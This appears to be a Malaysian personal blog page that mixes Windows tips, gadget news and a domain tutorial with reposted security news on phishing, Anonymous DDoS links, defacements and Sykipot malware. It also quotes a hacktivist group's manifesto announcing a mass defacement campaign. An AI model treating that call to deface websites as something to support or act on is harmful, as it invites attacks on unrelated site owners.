Pertama sekali,anda perlu buka menu RUN.Kemudian,sila taip "regedit".Akan keluar satu program baru.Kita akan mengedit tulisan tersebut dengan menggunakan program ini.

Anda perlu klik pada HKEY_CURRENT_USER>Control Panel>International.

Ini bermaksud,anda perlu klik pada "HKEY_CURRENT_USER",kemudian,klik pada "Control Panel",dan akhir sekali,klik pada "International"

Cari perkataan "s1159" dan double-click pada ia.Tukar perkataan "AM" kepada "pagi".

Seterusnya cari perkataan "s2359" dan double-click pada ia.Kemudian,tukar nilainya daripada "PM" kepada "petang".

Cuba restart semula komputer anda untuk mencuba keberkesanan tip ini.

Read more »

URL pendek sasaran malware !

Fortinet Inc. mengumumkan trend terkini servis pemendekan URL telah memberi peluang kepada penjenayah siber memasukkan link berbahaya yang akan menjangkiti seluruh sistem pengguna.

Berteraskan kemajuan teknologi yang semakin merajai masyarakat umum seluruh dunia,pasti anda tidak terkecuali untuk mengikuti perkembangan yang dikhabarkan 'memudahkan' urusan seperti servis pemendekkan URL.

Meskipun tujuan asal servis ini dibuat adalah untuk pengguna berkongsi serta 'memendekkan' alamat web yang panjang,namun akhir ini trend jenayah siber dikesan menerusi pendekatan pemendekkan URL.Ini membuatkan semua pengguna khususnya pengguna laman web sosial seperti Twitter dan facebook untuk sentiasa mengambil langkah berjaga-jaga kerana penawaran servis pemendekan URL boleh menjerat orang ramai.

Crime As A Service (CAAS)

Menyusuri kaedah yang sering digunakan,apabila pengguna klik pada pautan yang telah dipendekkan,dia akan terus dibawa ke laman web asal tersebut.Perkara ini berlaku kerana servis pemendekan URL adalah berfungsi untuk mengurangkan jumlah karakter pada alamat laman web,dan lazimnya digunakan di Twitter dan Facebook.

Medium penghantaran servis ini pula selalu digunakan menerusi e-mel kerana ada sesetengah e-mel akan memecahkan link yang panjang ketika sesi penghantaran dan penerimaan.

Sebenarnya,pemendekan URL ini mendatangkan manfaat buat pengguna.Selain ringkas dan mudah,dari segi lain teknik,ia juga mengelak atau berciri anti-spam.Namun penjenayah siber juga licik.Menerusi URL yang telah dipendekkan ini,mereka telah menaik taraf servis pemendekan URL sendiri bertujuan memintas teknologi spam yang terkini.Perkara ini adalah satu contoh istilah "Crime As A Service" yang ditawarkan penjenayah siber.

Daripada manfaat menjadi malapetaka

Manfaat servis pemendekan URL ini sebenarnya turut menjadi kelemahan terbesarnya.Hal ini kerana servis ini akan memberi peluang kepada penjenayah siber untuk menyamar dan memasukkan link berbahaya yang seterusnya akan menjangkiti sistem pengguna.

Perkara ini turut disokong oleh Fortinet Inc yang merupakan pembekal perkakas sekuriti rangkaian dan peneraju pasaran Unified Threat Management (UTM).Baru-baru ini,mereka mengeluarkan amaran menerusi laporan Lanskap Ancaman pada Oktober lalu mengenai bahayanya servis pemendekan URL yang mendedahkan orang ramai kepada serangan malware.

Bagi keselamatan pengguna,salah satu cara untuk mengenal pasti sama ada pautan URL yang telah dipendekkan akan beralih ke laman web berbahaya adalah dengan melihat domain pada akhir pautan tersebut.Kebanyakan daripada servis pemendekan URL adalah menggunakan domain.

Selain itu,pengguna juga dapat mengenalpasti secara menampal pautan tersebut kepada alat penapis URL untuk mengetahui sama ada ia mengandungi risiko serangan malware ataupun tidak.Dengan penapisan web yang betul juga akan memberikan pengguna perlindungan secara menyeluruh dari servis pemendekan URL dengan melakukan penyemakan domain secara penuh.

Anda juga boleh menampal alamat URL yang telah dipendekkan di salah satu laman web ini untuk mendapatkan alamat laman web yang sebenar :

• CheckShortURL
• LongURL

Read more »

Nikon D4

Nikon mengumumkan keterdapatan terbarunya Nikon D4,kamera format Nikon-FX yang bakal menjadi mercu tanda bagi barisan kamera DSLR syarikat itu.

D4 dilengkapi dengan sensor imej CMOS dengan saiz pengimejan 36.0x23.9mm dan kuasa enjin pemproses terkini XPEED 3,enjin yang direka khas untuk kamera jnis DSLR.Menawarkan versatiliti dan kefungsian yang lebih,di samping kualiti dan perincian imej yang diperkaya berserta kelajuan mantap.

Dengan kiraan piksel efektif 16.2MP ia mampu merakam imej hebat di mana-mana keadaan cuaca pada sensitiviti ISO luas 50 hingga ISO 204800.Sensor RGB 91K-piksel pula menyokong Sistem Pengesanan Latar Dimajukan (Advanced Scene Recognition System),yang mampu mengesan wajah manusia yang dibingkaikan menggunakan viewfinder.Ia juga menawarkan penambahbaikan dalam AF,AE,kawalan flash i-TTL dan ketepatan kawalan White Balance AWB.

Sistem AF menawarkan 51 titik fokus dan diperbaiki dengan kelajuan lebih bagus dalam autofokusnya serta kemampuan mengesan dan fokus pada subjek meskipun cahaya rendah.Tambahan,11 titik fokus adalah berfungsi sepenuhnya apabila lensa dengan apertur maksimum F/8 digunakan.

Semua ini bermaksud fokus yang lebih baik diperoleh termasuk ketika menggunakan lensa super-telephoto NIKKOR (2.0x).Untuk penggemar movie,fungsi rakaman video multi kawasan HD penuh disediakan,untuk rakaman HD penuh 30 fps.

Ia turut disertakan dengan pilihan kreatif.D4 merakam imej ke kad memori dan menyokong kad flash kelajuan tinggi UDMA-7 dan kad XQD.

Sudah semestinya gajet ini akan menjadi tumpuan ramai di pasaran.D4 turut dilengkapi WLAN untuk pemindahan imej kelajuan tinggi bebas komputer.

Lebih info tentang Nikon D4 ? Lihat disini --> Nikon | News | Digital SLR camera Nikon D4

Read more »

Anonymous tricked people into joining Web site attacks

If you clicked a link distributed by Anonymous yesterday, you may have unwittingly helped the online activists in their attacks against U.S. government and entertainment industry sites that were organized to protest proposed antipiracy legislation.

Anonymous has launched distributed denial-of-service attacks, designed to shut down Web sites, against government and corporate sites in the past. Typically, supporters download software called Low Orbit Ion Canon (LOIC) that directs their computer to repeatedly try to connect to a target Web site. So many digital knocks on the door, as it were, can shut a site down so no one can get in.

However, the source of the attack--the IP address for the individual computers attempting to access the site--can easily be traced when LOIC is used, putting participants at risk of prosecution. (Despite that threat, people have been downloading LOIC like mad since Wednesday, including more than 19,000 downloads in the last day, according to a blog post by security firm Imperva.)

So, Anonymous has come up with a way to allow people to participate without risking arrest. In protest of the Stop Online Piracy Act (SOPA), as well as yesterday's government takedown of file-hosting site Megaupload and the indictment of its operators, Anonymous launched DDOS attacks on more than a dozen sites and used a new tactic.

The group distributed Web links yesterday during its attacks on the Department of Justice, FBI, Universal Music and a host of other sites, that made joining the attacks as easy as clicking the mouse. The links led to Web pages with special JavaScript instructions that automatically redirected the visiting computer to a Web site being targeted for attack. The computer continues attempting to access the target site until the Web page is closed.

Another version of the tool, for people willing to participate, would direct computers to a Web page on which a visitor could type in the IP address to target and the page would automatically refresh in the background so the computer would continually try to access the target.

The tool relies on JavaScript being enabled, and given how many Web sites require JavaScript, it's likely most of the people who clicked the links were unwittingly drawn into the attacks.

It's likely that the tricky links increased the effectiveness of the attacks, which appeared to have impacted overall Internet traffic patterns, at least for a while, according to a real-time Web monitoring site operated by content delivery company Akamai. The site registered 218 attacks yesterday hours after the attacks started. Attack-related traffic was up 24 percent over normal, while general network traffic was up 14 percent.

The links were distributed on Twitter, IRC, Facebook, Tumblr, and other sites and there was no indication that they were potent. Some of the links led to sites similar to Pastebin, where Anonymous often posts its messages. Other links were obscured using Web address shorteners like Bitly.com.

"From the looks of things, this is on a scale we haven't seen before," said Graham Cluley, senior technology consultant at security company Sophos, who wrote a blog post about the tool. "We saw some Anonymous Twitter accounts gain hundreds of thousands of new fans overnight as word began to spread."

If you did happen to click one of the links, you aren't likely to get in trouble. For one, investigators might conclude that all the different IP addresses that hit the site during the attack were part of a botnet of compromised computers. And even if investigators suspected that the blasts from your IP address on the target site were conducted as part of the attack, it's unlikely that you would be singled out for a visit from the authorities, said Jennifer Granick, an attorney who has represented defendants accused of computer crimes.

"If you are an unwitting participant then technically you're not liable under the law because all criminal statutes, with some narrow exceptions, require some criminal state of mind," such as acting "knowingly" or "intentionally," she said.

"But even being part of a botnet could result in unwanted police attention anyway," Granick added. "That's probably unlikely, depending on how many computers are involved in the DDOS attack."

The situation is another story for the people distributing the attack-enabling links, however.

"If you are a distributor of malware that targets a site, you can be liable for all damage that occurs to that site as a result of the malware functioning," Granick said. "If you are distributing a program and intending to cause damage and that's what results, that is a violation under the law."

In computer crime cases, damage is usually defined broadly and includes resources needed to respond to an attack and return the system to normal, so damages can add up, she said.

Read more »

Asus Sites Hacked and Defaced by Hmei7

The Indonesian hacker Hmei7, responsible for defacing more than 70,000 sites, including ones that belong to Siemens, IBM and some important car manufacturers, did it again, this time defacing three Asus websites hosted on subdomains of Asus.com.

Zone-H provided mirrors of the defacements and as it turned out, in this particular instance the hacker was aided by H4x0rL1f3.

“ASUS got hacked !!! be secure, your security get down,” was the message posted by the hackers on the sites.

The breached domains are apservice.asus.com, vip.asus.com and member.asus.com, the former currently being taken down for maintenance.

The hackers didn’t deface the main pages, instead they added an x.html file, which could only be seen by the site’s admins to show them that their security could use some work.

At the time of writing, two of the subdomains were cleaned up, but the third one still hosted the defacement page.

Read more »

Phishers are posing as "Facebook Security" on chat

Scammers are posing as Facebook security in chat sessions to try to trick people into providing their credit card information, Kaspersky Lab warned yesterday.

"This Facebook phishing attack is pretty interesting because it does not just try to trick the victim into visiting a phishing Web site. It will reuse the stolen information and login to the compromised account and change both profile picture and name," writes David Jacoby, a Kaspersky Lab Expert, in a blog post.

"The profile picture will be changed to the Facebook logo and the name will be translated to 'Facebook Security'," he wrote.

After an account has been compromised, the scammers will use it to send out an instant message to the victim's contacts pretending to be Facebook Security, according to Jacoby. The message says "Last Warning: Your Facebook account will be turned off Because someone has reported you. Please do re-confirm your account security by:" and it provides a URL ending in ".vu" for the recipient to visit, he said.

The link redirects to a Web site that is made to look like a Facebook page and it prompts the visitor to provide name, e-mail, password, security question, e-mail account password, country and birth date, the blog post says. After that information is provided another page appears with a heading "Payment Verification" that asks for the first six digits of the person's credit card. A subsequent page then asks the visitor to verify the information by providing the full credit card number, expieration date and security code as well as billing address, Jacoby wrote.

A Facebook spokesman said the company was looking into the report and provided this statement:

Protecting the people who use Facebook from spam and malicious content is a top priority for us. We have spent several years developing protections to stop spam from spreading and have sought to cooperate with other industry leaders to keep users and their data safe. We've built enforcement mechanisms to quickly shut down malicious Pages, accounts and applications that attempt to spread spam by deceiving users or by exploiting several well-known browser vulnerabilities. We have also enrolled those impacted by spam through checkpoints so they can remediate their accounts and learn how to better protect themselves while on Facebook. Beyond these protections, we've put in place backend measures to reduce the rate of these attacks and will continue to iterate on our defenses to find new ways to protect people.

In addition to the engineering teams that build tools to block spam we also have a dedicated enforcement team that seeks to identify those responsible for spam and works with out legal team to ensure appropriate consequences follow.

As always, we advise people not to click on links in strange messages, even if those messages have been sent or posted by friends. This tip and many more can be found on our Facebook Security Page (http://www.facebook.com/security), which is followed by over four million people.

Meanwhile, there's another scam going on, this one involving e-mails, that's leveraging the Facebook brand. Scammers are sending e-mails purportedly from Facebook founder Mark Zuckerberg that claim that the recipients have won an iPad or iPhone as part of a special promotion sponsored by Facebook and Apple. The recipients are then directed to a page that asks for personal information and tricks them into agreeing to a small charge for participating in the offer.

Read more »

Chinese hackers targeting smart cards to grab U.S. defense data

Hackers in China have found a way to infiltrate supposedly secure smart cards used by U.S. government employees, according to security company AlienVault.

The security firm said it has seen dozens of such attacks, which tap into a unique variant of a nasty bit of malware known as Sykipot.

The hackers appear intent on stealing data from the Department of Defense and other related agencies. The malware is capable of capturing the PIN numbers used by government smart cards, thereby allowing access to supposedly secure information.

"Like we have shown with previous Sykipot attacks, the attackers use a spear phishing campaign to get their targets to open a PDF attachment which then deposits the Sykipot malware onto their machine," according to AlienVault.

"Then, unlike previous strains, the malware uses a keylogger to steal PINs for the cards. When a card is inserted into the reader, the malware then acts as the authenticated user and can access sensitive information. The malware is controlled by the attackers from the command & control center."

Government agencies use smart cards as an extra layer of security on top of passwords, according to the New York Times. Since passwords have been easy enough to hack, the smart cards were supposed to provide a final line of defense, at least until the new strain of Sykipot popped up.

Attacks using Sykipot have been around since 2007, says security vendor Trend Micro. The firm called the malware a "high priority threat" and pointed to several incidents over the past few years in which it has been used to exploit holes in such software as Adobe Reader, Internet Explorer 6, and Microsoft Excel.

But the latest round of attacks marks the first time that Sykipot has been used to breach smart cards, says AlienVault. The malware strain used by hackers specifically targets ActivIdentity, a smart card-based PKI (public key infrastructure) authentication method know for its compliance with certain U.S. government specifications.

With ActivIdentity as the target, the attacks are clearly aimed at U.S. defense departments, the Times added. But it's as yet unknown what information the hackers have so far been able to capture.

Credit to : Cnet News

Read more »

The Hackers Army (THA) melancarkan Operation Freedom Palestine

Baru sahaja ditubuhkan,tetapi sebuah kumpulan penggodam yang berbahaya iaitu The Hackers Army (THA) telah mengumumkan sebuah operasi secara besar-besaran iaitu Operation Freedom Palestine.Sebelum ini,mereka pernah membina reputasi di dunia siber dengan menggodam beberapa laman web berprofil tinggi termasuk laman web kumpulan hacktivist anonymous iaitu Anonyops.org.Mereka pernah membuatkan laman web itu terpaksa offline selama 24 jam.Ianya cuma permulaan bagi mereka sebelum mereka menggodam laman rasmi President of Guyana,Bharatiya Janata Party (BJP) dan banyak lagi.

Berikut ialah kenyataan rasmi yang dikeluarkan oleh mereka di laman Youtube :-

Greetings NATO Countries,

We The Hackers Army Are Going To Engage Operation Freedom Palestine on New Year Eve!!!

When All Of You Are Celebrating Your Success In Killing Children, Raping Women And Imprisoning Innocent Men. There Is A FaCt That Israel

Has Been Taking Over Palestine Brutally..

A Message To the whole World...

... Now, 63 years have passed since the

Israeli Declaration of Independence

and since then Palestinian children, women

and men are being killed and murdered

on daily basis, their land is occupied and their properties are confiscated.

Despite the brutality of the Israeli

regime, the world including the

dispassionate and neutral Arab states

of the Persian Gulf, watch the agony

and suffering of the Palestinian nation with apathy and indifference.

Sixty-three years ago the Zionists

demolished 438 Palestinian villages

and poisoned or destroyed wells to

ensure that their rightful owners would

not return. Today, Zionists keep on behaving more or less along the same

traditions, demolishing homes,

destroying farms, and narrowing

people's horizons, all with the goal of making them emigrate.

Israel celebrates freedom while more than nine million Palestinians are

treated like slaves or children of a lesser

God, some languishing in refugee

camps, also for 63 years, or subjected

to horrible conditions such as mass

detention, collective starvation, daily persecution, with no freedom and very

little hope for a better tomorrow.

According to Palestine News Network,

Nakba demonstrations are expected to

take place all over the West Bank, Al-

Quds, Gaza and the countries across the world.

Fearing the possible massive

gatherings of the Palestinian citizens in

the occupied territories, the Israeli

forces have adopted tough security

measures ahead of the Nakba Day protests and arrested several

Palestinians.

you can imprison our PALESTINIAN brothers but you cannot imprison our hope. we will fight till the end , and we are coming to take revenge.

we are not afraid to die because Whenever death may surprise us, Let it be welcome if our battle cry has reached even one receptive ear and another hand reaches out to take up our Cause...

We Are Not A Liberators.

Liberators Do

Not Exist.

The People Liberate

Themselves.

We Defend The OPPRESSED,

and

FIGHT

The OPPRESSOR!

http://www.facebook.com/TheHackersArmyOffical

Ini adalah video rasmi tentang operasi tersebut :-

Laman facebook rasmi yang digunakan oleh mereka ialah The Hackers Army (THA) dan senarai laman yang telah mereka godam telahpun di letakkan di laman Pastebin.

Menurut sebuah event yang dibuat oleh para defacer,operasi ini akan dijalankan pada 13 Januari sehingga 14 Januari.Tema yang akan digunakan sempena deface mereka ini pula ialah bebaskan palestin.Setiap laman yang telah dideface perlu mempunyai perkataan "#Operation Freedom Palestine".Dan laman yang akan mereka serang tidaka akan mengira negara.Ini bermakna,laman web milik semua negara boleh digodam.

Read more »

10 cara syaitan kuasai hati manusia

Sifat sombong dan angkuh

Dua sifat mudah tersemai dan menyubur dalam diri manusia. Ia berpunca daripada keegoan manusia yang lazimnya mudah hanyut ketika dilimpahi kemewahan.

Bakhil dan kedekut

Setiap harta benda dan kemewahan adalah kurniaan Allah yang harus dibelanjakan ke jalan benar. Ia boleh digunakan untuk membantu kesempitan hidup orang yang memerlukan sama ada melalui kewajipan berzakat atau sedekah.

Takbur dan bongkak

Sifat ini selalu bertapak dalam diri manusia yang berasakan memiliki segala-galanya dalam hidup. Mereka terlupa kesenangan dan kenikmatan dikurniakan itu boleh ditarik oleh Allah pada bila-bila masa saja.

Allah berfirman yang bermaksud: "Sesungguhnya Dia tidak menyukai orang yang takbur." (Surah an-Nahl, ayat 23)

Sifat khianat

Khianat yang dimaksudkan bukan saja melalui perbuatan merosakkan sesuatu yang menjadi milik orang lain, tetapi juga mengkhianati hidup orang lain dengan tidak mematuhi perjanjian atau perkongsian yang dibuat.

Tidak suka menerima ilmu dan nasihat

Junjungan Rasulullah SAW selalu menasihati sahabat supaya mengelakkan diri daripada menjadi golongan keempat di kalangan manusia yang dibenci Allah iaitu tidak suka diri mereka dinasihati atau mendengar nasihat orang lain.

Hasad dengki

Sifat ini selalu diikuti rasa benci dan dendam berpanjangan. Rasulullah SAW bersabda bermaksud: "Hindari kamu sifat hasad kerana ia memakan amalan kamu seperti api memakan kayu kering." (Hadis riwayat Bukhori dan Muslim)

Meremehkan orang lain

Sifat ego manusia selalu lahir apabila individu berasa dirinya sempurna berbanding orang lain yang dilihat terlalu kecil dan kerdil dengan apa dia miliki.

Abu Umamah pernah meriwayatkan Rasulullah SAW pernah bersabda bermaksud: "Tiga kelompok manusia yang tidak boleh dihina kecuali orang munafik ialah orang tua Muslim, orang berilmu dan imam yang adil." (Hadis riwayat Muslim)

Sifat ujub atau bangga diri

Menurut Imam Ahmad, Rasulullah SAW bersabda bermaksud: "Jangan kamu bersenang-lenang dalam kemewahan kerana sesungguhnya hamba Allah bukan orang yang bersenang-senang saja." (Hadis riwayat Abu Naim daripada Muaz bin Jabal)

Suka berangan-angan

Islam anti-kemalasan. Orang yang berat tulang untuk berusaha mencapai kecemerlangan dalam hidup dipandang hina oleh Allah dan manusia. Mereka lebih gemar berpeluk tubuh dan menyimpan impian tinggi tetapi amat malas berusaha untuk memperolehnya.

Buruk sangka

Seseorang yang suka menuduh orang lain melakukan sesuatu kejahatan tanpa diselidik amat dicela Islam. Sabda Rasulullah SAW bermaksud: "Nanti akan ada seseorang berkata kepada orang ramai bahawa mereka sudah rosak. Sesungguhnya orang yang berkata itulah sebenarnya yang sudah rosak dirinya." (Hadis riwayat Muslim)

Credit to : Remaja Islam

Read more »

Domain "co.cc" percuma buat blogger !

Co.cc merupakan pilihan terbaik jika anda ingin sebuah domain untuk platform blogger anda.Anda tidak perlu mengeluarkan wang untuk mendapatkannya.Jadi,ia merupakan pilihan terbaik buat blogger yang tidak mahu menggunakan domain ".blogspot.com" dan bertukar kepada "co.cc".Jadi,blog anda akan kelihatan lebih professional!

Nama domain "co.cc" juga mempunyai banyak pilihan.Jadi,anda boleh sahaja menggunakan nama anda sebagai link domain tersebut.

Untuk membantu anda,saya akan menulis sebuah tutorial tentang cara-cara untuk mendaftar dan menggunakan domain ini.

Antara kebaikan anda menggunakan domain ini ialah :

• Ianya percuma
• Tidak pelukan wang untuk memperbaharui semula domain
• Anda boleh men"redirect"kan link kepada blog anda
• Memberikan sentuhan professional kepada blog anda

Cara - cara untuk menggunakannya di blogger.com

1. Anda perlu mendaftar terlebih dahulu untuk menggunakan domain ini. Daftar di SINI
2. Selepas itu,anda perlu memasukkan semula email dan password anda.
3. Kemudian,anda perlu memilih nama domain yang sesuai untuk blog anda.
4. Sila masukkan nama domain anda di kotak yang disediakan.
5. Jika www.domain_anda.co.cc is not available,itu bermakna nama domain tersebut tidak boleh didaftarkan.Tetapi,jika www.domain_anda.co.cc is available,itu bermakna,anda boleh pergi ke peringkat seterusnya iaitu pendaftaran domain.
6. Klik pada
7. Kemudian anda perlu memasukkan email dan password.Setelah anda memasukkan email dan password,akan tertera begini di skrin anda.

   We have received your request for domain name registration.

   www.domain_anda.co.cc

   Anda perlu set up domain anda dalam masa 48jam.Klik pada butang

8. domain_anda.Co.CC
   	Expires on : 201x-xx-xx

   Teruskan klik pada butang set up.Di sini,akan tertera tarikh tamat akaun anda.Iaitu setahun kamudian.
9. Akan ada tiga pilihan di skrin anda.Sila klik pada 2.Zone Records
10. Masukkan nama domain anda di bahagian Host : jangan lupa untuk meletakkan perkataan www
11. Pada bahagian TTL : kekalkan pada 1D
12. Pada bahagian Type : sila pilih CNAME
13. Pada bahagian Value : sila taip ghs.google.com
14. Kemudian klik
15. Kini,anda telah selesai mendaftar domain di Co.cc.Anda perlu set up di blogger anda pula.
16. Buka blogger.com,login akaun anda.Klik pada Settings,klik pada Publishing.
17. Klik Custom Domain kemudian klik pada Switch to advanced settings . Masukkan nama domain anda di bahagian Your Domain dan jangan lupa untuk turut meletakkan perkataan www
18. Masukkan juga word verification.

Jika anda mempunyai sebarang masalah,sila komen di ruangan bawah atau post di wall saya iaitu di http://www.facebook.com/ShuichiSyad . Saya akan balas secepat yang mungkin.

Read more »

How to block a website [English Version]

If someone asked you."How to control your kids on the net?",what would you answer?

Will you put a password at the laptop so they cannot even gain an access to the web?

Or will you just stay beside you kids to watch over him?

I know that all the answer above is a bit crazy idea.Except the "put a password" idea.

So, in this pictorial (picture + tutorial),I will share to you on how to block a website on your laptop.

If you got any enquiries,you may leave a comment or just post to my wall on facebook (http://www.facebook.com/ShuichiSyad).

First,you have to go to menu RUN (simply press the button of Windows flag + R button on the keyboard or click on START button and click on RUN).After that,put this code in the textbox provided.

Then,click on OK.You'll see a folder named "etc" and a four or five files in it ("lmhosts.sam","networks","protocol","services" and if you were lucky,there will be a file called "hosts").If you already got a file called hosts(you were lucky man!),you may proceed the creating file part.

I assume that your folder called "etc" does not contain a file called "hosts",so,I will teach you how to make it.Believe me,it is very simple.

First,open up a notepad (new notepad).

Then,type in the notepad this

127.0.0.2 www.yahoo.com

You may change the address www.yahoo.com with another website that you want to block.

In this pictorial,I will block www.yahoo.com.

And please remember,make a space between 127.0.0.2 and www.yahoo.com.

If you want to block two or three sites,just do it like this :

127.0.0.2 www.yahoo.com

127.0.0.2 www.google.com

127.0.0.2 www.youtube.com

This will block Youtube,Yahoo and Google.

If you are done listing the website that you want to block,click "File" and then "Save As"

Rename the file as "hosts" and save the file type as "All Files".

If you look at the "etc" folder,you'll saw a new file created.

Just rename it as "hosts",make sure it's name was not "hosts.txt".

So,your "hosts" file is now created!

For the user which already got their own "hosts" file,you have to right-click on the file,and choose "Open" (you may use "Notepad++" to open it) ,then,choose the notepad and select open file.

Your "hosts" file will opened using a notepad (or notepad++ if you're using it).You'll see a lot of comment,just scroll down and you will saw something like this :

127.0.0.1 localhost

Then,add your blocked site just like im teaching at the above.

Create a new line,then put the code.

Actually the technique is same.

So,now you're done!

You've just blocked a website.

Right-click on the image and select open link in new tab or click on the image for a better view.

As I said,if you got any enquiries or problem,just leave a comment or post on my wall (http://www.facebook.com/ShuichiSyad).I'l reply as soon as possible.

Thanks for reading.

Read more »